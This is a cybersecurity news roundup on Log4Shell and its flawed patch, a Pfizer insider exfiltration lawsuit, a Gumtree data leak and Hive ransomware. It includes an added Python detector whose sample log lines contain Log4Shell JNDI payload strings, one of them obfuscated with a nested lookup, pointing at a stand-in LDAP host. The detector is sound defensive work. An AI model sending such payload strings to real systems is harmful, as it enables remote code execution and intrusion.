Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Editor's Note: Welcome to this issue of Forcepoint Security News. It's curated news meant to provide a quick look at what's happening around the cybersecurity industry.
Log4Shell Vulnerability Lets Attackers Execute Code on Millions of Machines
The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download and execute malware that can run cryptocurrency mining software, release sensitive data, take part in a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages. The problem is exacerbated by the ubiquity of Java code and the use of Log4j for monitoring and troubleshooting that code. The vulnerability is now being used by state-backed hackers all over the world.
The Initial Log4j Vulnerability Patch Is Itself Vulnerable
Researchers are reporting that there are at least two vulnerabilities in the initial Log4j vulnerability patch, released as Log4j 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets. The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046. Researchers said the earlier fix "was incomplete in certain non-default configurations" and made it possible for attackers to launch denial-of-service attacks from the affected systems. Version 2.16.0 "fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default."
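As an added example (not from the article, and not code from the Log4j project), the following Python detector shows how a defender can scan logged request fields for the lookup strings the two Log4j items above describe. It assumes constructed sample log lines and models only Log4j's documented lookup syntax (`${jndi:...}`, plus the `lower:`, `upper:` and `:-` default forms, which can nest), so it collapses nested lookups before matching.

```python
import re

# Constructed sample log lines (not from the article); the last field is the
# logged User-Agent, a common place for a crafted lookup string to be logged.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://example.invalid/a}"',
    '10.0.0.3 - - "POST /login HTTP/1.1" 200 "${java:version}"',
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(body):
    """Model one innermost Log4j lookup; None means 'keep it verbatim'."""
    key = body.lower()
    if key.startswith("jndi:"):      # the lookup we want to surface, not hide
        return None
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                 # ${name:-default} -> 'default' if name is unset
        return body.split(":-", 1)[1]
    return None                      # unknown lookup: leave it, do not guess

def normalize_lookups(text, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        def replace(m):
            value = _resolve(m.group(1))
            return m.group(0) if value is None else value
        new = _INNER.sub(replace, text)
        if new == text:
            break
        text = new
    return text

def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for lines carrying a jndi: lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits
```

A hit in a web-server access log is only evidence that a lookup string was received; whether it was evaluated depends on the Log4j version and configuration of the application that logged it.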
Pfizer Alleges Worker Exfiltrated Company Trade Secrets
Pfizer has filed legal action against a former employee, alleging she uploaded to personal devices and accounts thousands of files containing confidential information and trade secrets pertaining to the company's vaccines and medications, including its COVID-19 vaccine, to potentially provide to her new employer, a competing biopharmaceutical company. In its complaint, Pfizer says that as part of its tracking of employee activity on company devices, the company's security team discovered on Oct. 29 that, between Oct. 23 and Oct. 26, while the employee was "out of office," she transferred over 12,000 files from her Pfizer laptop to an online Google Drive account.
Gumtree Classifieds Site Leaked Personal Info via the F12 Key
British classifieds site Gumtree.com suffered a data leak after a security researcher revealed that he could access sensitive personally identifiable data of advertisers simply by pressing F12 on the keyboard and revealing the website's source code. Pen Test Partners security researcher Alan Monie discovered that he could see PII of advertisers that included full name, email address, account registration data, and postcode or GPS coordinates. These leaked users could be targeted by phishing or social engineering attacks that use this information to try to harvest more sensitive information. The vulnerability was not completely resolved until almost a month after being discovered.
Hive Ransomware Enters Big League with Hundreds Breached in Four Months
The Hive ransomware-as-a-service gang is more active and aggressive than its leak site shows, with affiliates attacking an average of three companies every day since the operation became known in late June. Security researchers gleaning information straight from Hive's administrator panel found that affiliates had breached more than 350 organizations over four months. The gang's data leak site currently lists only 55 companies that did not pay the ransom, suggesting that many Hive ransomware victims paid the ransom. But as chat messages between victims and affiliates show, even those that paid the ransom were unable to recover their servers with the provided decryption software.